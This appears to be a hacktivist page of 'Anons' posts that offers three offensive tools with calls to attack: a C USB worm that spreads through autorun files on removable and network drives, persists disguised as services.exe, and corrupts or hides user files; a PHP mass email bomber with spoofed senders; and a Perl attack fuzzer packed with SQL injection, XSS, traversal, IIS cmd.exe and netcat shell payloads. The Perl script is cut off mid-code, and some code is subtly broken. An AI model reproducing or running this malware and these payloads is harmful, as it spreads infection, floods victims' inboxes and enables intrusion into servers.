USB Worm

Anons,

We must continue to step up our efforts. Below I have written a USB worm virus. Enjoy! Antisec is strong, stay strong.

#include <windows.h>
#include <stdio.h>
#define IMSG “|__[__]__/=+-\\ SaveItForLater :] USB Worm /-+=\\__[__]__|”
char me[1024];
HKEY hKey;
char *drives[] = {“C:”,”D:”,”E”,”F:”,”G:”,”H:”,”I:”,”J:”,”K:”,”L:”,
                  “M:”,”N:”,”O:”,”P:”,”Q:”,”R:”,”S:”,”T:”,”U:”,”V:”,
                  “W:”,”X:”,”Y:”,”Z:”};
DWORD WINAPI spreadUSB()
{
    while(1)
    {
        Sleep(120000);
        int i;
        for(i = 0;i < 24;i++)
        {
            if((GetDriveType(drives[i])) == DRIVE_REMOVABLE)
            {
                char hldPath[50];
                char usbFile[30] = “\\Driver_Update.exe”;
                char autoRun[50] = “[autorun]\r\nopen=Driver_Update.exe”;
                strcpy(hldPath,drives[i]);
                strcat(hldPath,”\\autorun.inf”);
                FILE *fp = fopen(“autorun.inf”,”w”);
                fprintf(fp,autoRun);
                fclose(fp);
                CopyFile(“autorun.inf”,hldPath,0);
                remove(“autorun.inf”);
                strcat(drives[i],usbFile);
                CopyFile(me,drives[i],0);
            }
            else if((GetDriveType(drives[i])) == DRIVE_CDROM)
            {
                char cdPath[50];
                char cdFile[20] = “\\Worm_Pwn.exe”;
                char cdAutr[50] = “[autorun]\r\nopen=Worm_Pwn.exe”;
                strcpy(cdPath,drives[i]);
                strcat(cdPath,”\\autorun.inf”);
                FILE *fpp = fopen(“autorun.inf”,”w”);
                fprintf(fpp,cdAutr);
                fclose(fpp);
                CopyFile(“autorun.inf”,cdPath,1);
                remove(“autorun.inf”);
                strcat(drives[i],cdFile);
                CopyFile(me,drives[i],0);
            }
            else if((GetDriveType(drives[i])) == DRIVE_REMOTE)
            {
                char remName[20] = “\\Upd_Config.exe”;
                strcat(drives[i],remName);
                CopyFile(me,drives[i],0);
            }
        }
    }
}
BOOL Startup()
{
    char dropTo[1024];
    GetWindowsDirectory(dropTo,1024);
    strcat(dropTo,”\\services.exe”);
    if((CopyFile(me,dropTo,1)) == 0)
        return 0;
    else
    {
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, “Software\\Microsoft\\Windows\\CurrentVersion\\Run”,0,KEY_SET_VALUE,&hKey) == ERROR_SUCCESS)
        {
            RegSetValueEx(hKey,”services”,0,REG_SZ,(const unsigned char*)dropTo,strlen(dropTo));
            RegCloseKey(hKey);
        }
        return 1;
    }
}
DWORD WINAPI changeTitle(LPVOID lParam)
{
    while(1)
    {
        HWND hWnd = GetForegroundWindow();
        SetWindowText(hWnd,”|__[__]__/=+-\\ SaveItForLater :] Worm – illuz1oN /-+=\\__[__]__|”);
    }
}
void winLogin(void)
{
    HKEY hKey;
    char szCaption[] = ”          |__[__]__/=+-\\ illuz1oN /-+=\\__[__]__|”;
    char szText[] = ”             |__[__]__/=+-\\ SaveItForLater :] Worm By illuz1oN /-+=\\__[__]__|”
                    “\nIf you want to remove this worm, contact illuz1oN – illuz1oN@hotmail.co.uk”
                    “\n… AV Companies ~censored~ You …”;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon”,0,KEY_SET_VALUE,&hKey);
    RegSetValueEx(hKey,”LegalNoticeCaption”,0,REG_SZ,(const unsigned char*)szCaption,sizeof(szCaption));
    RegCloseKey(hKey);
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon”,0,KEY_SET_VALUE,&hKey);
    RegSetValueEx(hKey,”LegalNoticeText”,0,REG_SZ,(const unsigned char*)szText,sizeof(szText));
    RegCloseKey(hKey);
}
int WINAPI WinMain (HINSTANCE hinst,HINSTANCE prhin,LPSTR argsx,int in)
{
    GetModuleFileName(0,me,1024);
    CreateMutex(0,0,”-+- illuz1oN -+-“);
    if(GetLastError() == ERROR_ALREADY_EXISTS)
    {
        ExitProcess(0);
    }
    else
    {
        if((Startup()) == 0)
        {
         char szMask[4] = “*.*”;
         DWORD ret = 0;
         WIN32_FIND_DATA fData;
         HANDLE hFind,hFile;
         hFind = FindFirstFile(szMask,&fData);
         if(fData.cFileName == “*.txt”)
         {
            hFile = CreateFile(fData.cFileName,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
            if(hFile == INVALID_HANDLE_VALUE)
               ExitProcess(0);
            else
            {
               WriteFile(hFile,IMSG,sizeof(IMSG),&ret,0);
               CloseHandle(hFile);
            }
         }
         else if(fData.cFileName == “*.exe”)
         {
            SetFileAttributes(fData.cFileName,FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
            CloseHandle(hFile);
         }           
         while (FindNextFile(hFind,&fData))
         {
            if(fData.cFileName == “*.txt”)
            {
               hFile = CreateFile(fData.cFileName,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
               if(hFile == INVALID_HANDLE_VALUE)
                  ExitProcess(0);
               else
               {
                  WriteFile(hFile,IMSG,sizeof(IMSG),&ret,0);
                  CloseHandle(hFile);
               }
            }         
            else if(fData.cFileName == “*.exe”)
            {
               SetFileAttributes(fData.cFileName,FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
               CloseHandle(hFile);
            }               
         }           
         FindClose(hFind);
        }
        else
        {
            winLogin();
            unsigned long title;
            CreateThread(0,0,changeTitle,0,0,&title);
            unsigned long virii;
            CreateThread(0,0,spreadUSB,0,0,&virii);
            Sleep(INFINITE);
        }
    }
}

The Infamous Email Bomber

Greetings Fellow Anons!

For decades, hackers and crackers internationally have been using the email bomber program to create havoc. That is just what the antisec movement needs. I have written a php version of it, enjoy! Stay strong. 

<?php
 

// Remember, you must add in any filtration
// functions yourself, such as the famous
// mysql_real_escape_string(); or even
// htmlentities(); or a custom function...
 
$f_name = isset($_POST['f_name']) ? $_POST['f_name'] : "";
$f_email = isset($_POST['f_email']) ? $_POST['f_email'] : "";
 
$r_email = isset($_POST['r_email']) ? $_POST['r_email'] : "";
 
$subject = isset($_POST['subject']) ? $_POST['subject'] : "";
$message = isset($_POST['message']) ? $_POST['message'] : "";
 
$number = isset($_POST['number']) ? preg_replace('/\..*/', '', $_POST['number']) : "";
 
$header = "From: ".$f_name." <".$f_email.">\n";
$header .= "Reply-To: ".$f_email."\n";
 
echo "<center>\n";
 
if ($f_name != "" || $f_email != "" || $r_email != "" || $subject != "" || $message != "" || $number != "") {
        $errors = "";
 
        if (strlen($f_name) > 40) {
                $errors .= "Your name must be 40 characters or less.<br />\n";
        }
 
        if ($f_email == "") {
                $errors .= "You must enter a sender email address.<br />\n";
        } else {
                if (!preg_match("/^[-0-9A-Z_.]{1,50}@([-0-9A-Z_.]+.){1,50}([0-9A-Z]){2,4}$/i", $f_email)) {
                        $errors .= "You must enter a valid sender email address.<br />\n";
                }
        }
 
        if (strlen($f_email) > 60) {
                $errors .= "Your email must be 60 characters or less.<br />\n";
        }
 
        if ($r_email == "") {
                $errors .= "You must enter a recipient email address.<br />\n";
        } else {
                if (!preg_match("/^[-0-9A-Z_.]{1,50}@([-0-9A-Z_.]+.){1,50}([0-9A-Z]){2,4}$/i", $r_email)) {
                        $errors .= "You must enter a valid recipient email address.<br />\n";
                }
        }
 
        if (strlen($r_email) > 60) {
                $errors .= "The recipient email must be 60 characters or less.<br />\n";
        }
 
        if (strlen($subject) > 40) {
                $errors .= "The subject must be 40 characters or less.<br />\n";
        }
 
        if ($message == "") {
                $errors .= "You must enter a message to send.<br />\n";
        }
 
        if ($number == "") {
                $errors .= "You must enter a number of messages to send.<br />\n";
        } else {
                if ($number < 2) {
                        $errors .= "You must enter a number greater than 1.<br />\n";
                } elseif ($number > 9999) {
                        $errors .= "You must enter a number less than 10000.<br />\n";
                }
        }
 
        if ($errors == "") {
                if ($subject == "") {
                        for($i=1; $i <= $number; $i++){
                                mail($r_email, substr(md5(rand(1, 100)), 0, 5), $message, $header);
                        }
                } else {
                        for($i=1; $i <= $number; $i++){
                                mail($r_email, $subject, $message, $header);
                        }
                }
 
                echo $number." messages have been sent to ".$r_email." successfully.<br />\n<a href='nojavascript...history.go(-1);' title='Start Another Mail Bomb'>Start Another Mail Bomb</a><br />\n";
        } else {
                echo "<span style='color: red;'>n".$errors."</span>\n<a href='nojavascript...history.go(-1);' title='Try Again'>Please Try Again</a><br />\n";
        }
} else {
        echo "* Denotes a required field.<br /><br />nNote that leaving a subject blank<br />nwill generate a random subject<br />nfor every new message.<br /><br />\n";
        echo "<table cellspacing='2' cellpadding='2'>\n";
        echo "<form action='' method='post'>\n";
        echo "<tr>\n";
        echo "<td>Your Name:</td>\n";
        echo "<td><input type='text' name='f_name' size='50' maxlength='40' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Your Email: *</td>\n";
        echo "<td><input type='text' name='f_email' size='50' maxlength='60' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Recipient Email: *</td>\n";
        echo "<td><input type='text' name='r_email' size='50' maxlength='60' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Subject:</td>\n";
        echo "<td><input type='text' name='subject' size='50' maxlength='40' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Message: *</td>\n";
        echo "<td><textarea name='message' rows='5' cols='50'></textarea></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Number Of Messages: *</td>\n";
        echo "<td><input type='text' name='number' size='4' maxlength='4' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td></td>\n";
        echo "<td><input type='submit' value='Start Mail Bomb' /></td>\n";
        echo "</tr>\n";
        echo "</form>\n";
        echo "</table>\n";
}
 
echo "</center>\n";
 
?>

Perl Server Fuzzer

Greetings Anons,

As our revolution grows more and more urgent, our channels of attack and our tools at our disposal must be used to their fullest potential. Below I have written a perl script for server fuzzing, remember the revolution! Do not forgive, nor forget! Stay strong my friends.

 

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use 5.0.10;
use strict;
use warnings;

my $host = $ARGV[0];

 
my @Fuzzer=(
      “cat ../../etc/passwd%00″,”alert(document.cookie);”,”/cgi-bin/*”,”/cgi-bin/”,
      “&0=+1+union+select”,”order+by+5–“,”order+by+100–“,”SELECT * FROM users–“,”../../etc/group”,
      “SELECT * FROM wp_users–“,”cat%20../../etc/group%00”,
      “PUT /pentest/windows-binaries/tools/nc.exe && nc -lvp 8080 -e cmd.exe”,
      “cd /var/www/htdocs && grep phpinfo www”,”‘ or ‘a’=’a”,”or 1=1″,”../../../boot.ini”,
      “‘ or ‘x’=’x–“,”admin’–“,”echo <?php phpinfo()?>”
                       ); 

my @XSS = ( “”>alert(‘XSS’) “, 
            “”>alert(123)<“,
            “”><IMG SRC=”javascript:alert(123);”> “,   
            “”>alert(123)”, 
            “”>”, 
            ” “><IMG SRC=”javascript:alert(‘XSS’)”> “,
            “”><IMG SRC=nojavascript…alert(‘XSS’)> “,
            “”><IMG SRC=nojavascript…alert(‘XSS’)> “,
            “”><IMG “””>alert(“XSS”)”> “,
            ” “><IMG “””>alert(123)> “,
            “”><IMG SRC=nojavascript…alert(String.fromCharCode(88,83,83))> “,
            ” <IMG SRC=”jav%20%20%20%20ascript:alert(‘XSS’)”;”> “,
            “”>alert(document.cookie) “,
            ” “><alert(123);//<“,
            “”><IMG SRC=java%00script:alert(String.fromCharCode(88,83,83))> “,
           ); #<-Add XSS payload strings here. Its a bitch
                                                                                                                                                                                             #to debug if you dont escape quotes
my @SQLtests = ( ” ‘ “,” ” “,” ‘ or 1=1– ” , ” ‘ or ‘a’=’a”,” ‘ or ‘x’=x”, ” ” or “z”=”z”,
                 “1 OR 1=1–“,”1,1″, ” ‘ or 5-5–“,”‘ having 1=1–” );

my @MSSQL= (“‘ having 1=1–“,”1 EXEC SP_ (or EXEC XP_)”,”1 AND USER_NAME() = ‘dbo'”, ” ;exec..cmd=’dir'”,
        “AND 1=(SELECT COUNT(*) FROM tablenames); –“,”+1 UNION ALL SELECT 1,2,name,4,5,6,7 FROM sysObjects WHERE xtype = ‘U’–“,
       “1+UNION/**/ SELECT/**/ALL FROM WHERE “,”1 UNION ALL SELECT 1,2,3,4,5–“,”select * from users having 1=1+GROUP BY uid;–“,
       “-1+union+select+null–“,
       “-1+union+select+null,null;–“,
       “-1+union+select+null,null,null–“,
       “-1+union+select+null,null,null,null–“,
       “-1+union+select+null,null,null,null,null–“,
       “-1+union+select+null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null’–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null’–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null;–“, 
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null–“
                                               ); #<- MSSqli strtings

my @MYSQL= (“1+order+by+2–“,”1+order by 3–“,”order by 50–“,”1+order+by+5–“,”1+order+by+6–“,”1+order+by+7–“,”1+order+by+8–“,
       “1+order+by+9–“,”1+order+by+10–“,”1+order+by+11–“,”1+order+by+12–“,”1+order+by+13”,”1+order+by+14–“,
       “and+1/**/union/**/select”,
       “-1/**/union/**/select/**/null–“,
       “-1/**/union/**/select/**/null,null–“,
       “-1/**/union/**/select/**/null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null–“);

my @LFIlogs = (“../../var/log/httpd/error.log”,”../../var/log/httpd/error_log”,”../../var/log/apache/error.log”,
               “../../var/log/apache/error_log”,”../../var/log/apache2/error.log”,” ../../etc/passwd%00″,
              “../../var/log/apache2/error_log”,”../../logs/error.log”,”../../usr/local/apache/logs/error_log”,
               “../../var/log/apache/error_log”,”../../var/log/apache/error.log”,”../../var/www/logs/error_log”,
               “../../etc/httpd/logs/error_log”,”../../etc/httpd/logs/error.log”,”../../etc/passwd”,
               “../../var/www/logs/error.log”,”../../usr/local/apache/logs/error.log”,”../../etc/group”,
               “../../var/log/error_log”,”../../apache/logs/error.log”,”../../etc/passwd”,”../../etc/group%00″
                                           );#<-LFI and/or traversal to possible LFI strings

my @CGIs = (“/cgi-bin/handler/bah;cat%20%20%20/etc/passwd|?  data=Download”, 
       “../cgi-bin/handler/bah;cat%20%20/etc/passwd |    ?  data=Download”, 
       “/cgi-bin/test-cgi?/* Replace /*”,
       “/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd”,
       “../blah.php?source=/msadc/Samples/../../../../../boot.ini”,
       “../cgi-bin/faxsurvey?/bin/cat%20%20%20%20/etc/passwd”,
       “/cgi-bin/campas?%0acat%0a/etc/passwd%0a”,
       “/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd”,
       “/archive-j457nxiqi3gq59dv/199805/count.cgi.l”,
       “/cgi-bin/pfdispaly.cgi? /../../../../etc/passwd”,
       “/cgi-bin/pfdispaly.cgi?’%0A/bin/uname%20-a|'”,
       “/scripts/convert.bas?../../win.ini”,
       “/cgi-bin/htmlscript? ../../../../etc/passwd”,
       “/cgi-bin/infosrch.cgi cmd=getdoc&db=man&fname=|/bin/id”,
       “/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd”,
       “echo -e “GET http://$host/cgi-bin/loadpage.cgi? user_id=1&file=|”/bin/ls”| HTTP/1.0″ | nc  -lvp 8080”
               ); #Arbitrary cgi strings

my @Unicode = (“/scripts/..%c0%af../winnt/system32/cmd.exe?/c+”,”/scripts..%c1%9c../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+”,”/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+”,”/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+”,”/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c1%af../winnt/system32/cmd.exe?/c+”,”/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+”,”/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+”,”/MSADC/root.exe?/c+dir”,
               “/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+”,
               “/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir”,”/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir”,”/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%252f../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,”/scripts/..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
“/scripts/root.exe?/c+dir/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,             “/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/c/winnt/system32/cmd.exe?/c+dir”,
               “/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/d/winnt/system32/cmd.exe?/c+dir”,
               “/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir”,
               “/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir”
                            );

my @options = (“1)MySql Fuzz?\n”,”2)MSSQL Fuzz?\n”,”3)XSS fuzz?\n”,”4)CGI Fuzz?\n”,”5)Unicode Fuzz?\n”,”6)General Fuzz?\n”,
               “7)Fuck it, throw it all at it and lets see what happens,lol\n”);

print “***************************************************************************\n”;
print ”                              Perl Fuzzer                                  \n”;
print “***************************************************************************\n”;
print “General attack fuzzer. Perl Fuzzer sends attack strings then outputs the   \n”;
print “the results to an html file. The html files are named goodcode.html or     \n”;
print “badcodes.html depending on server response.You are receiving actual html   \n”;
print “code from the server once opening the file so XSS tends to fire off.All attack\n”;
print “responses will be returned to you in the way it would\’ve live in the browser.\n”;
print “all at once so keep this in mind. Also, be careful running a full scan unless\n”;
print “your system has a decent amount of memory. Opening the large html file can eat\n”;
print “up a large amount of memory. Smaller computers should stick with the single   \n”;
print “scan modes. Have fun 😀                                                       \n”;
print “*****************************************************************************\n”;
print “********Unauthorized scanning is illegal and I take no responsibility********\n”;
print “*****************************************************************************\n”;
foreach my $options(@options){
               print $options,”\n”;
}
print “Scan Type? 1-7:\n”;
my $res = <STDIN>;
chomp $res;

   if($res =~ /1/){
   foreach my $scan(@MYSQL){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending MYSQL attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /2/){
   foreach my $scan(@MSSQL){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending MSSQL attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /3/){
     foreach my $scan(@XSS){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending XSS attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /4/){
     foreach my $scan(@CGIs){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending CGI attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /5/){
      foreach my $scan(@Unicode){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending Unicode attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /6/){
      foreach my $scan(@Fuzzer){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending General attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /7/){
      foreach my $scan(@MSSQL,@MSSQL,@XSS,@Unicode,@CGIs){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending All attack strings..This going to get is noisy!\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}
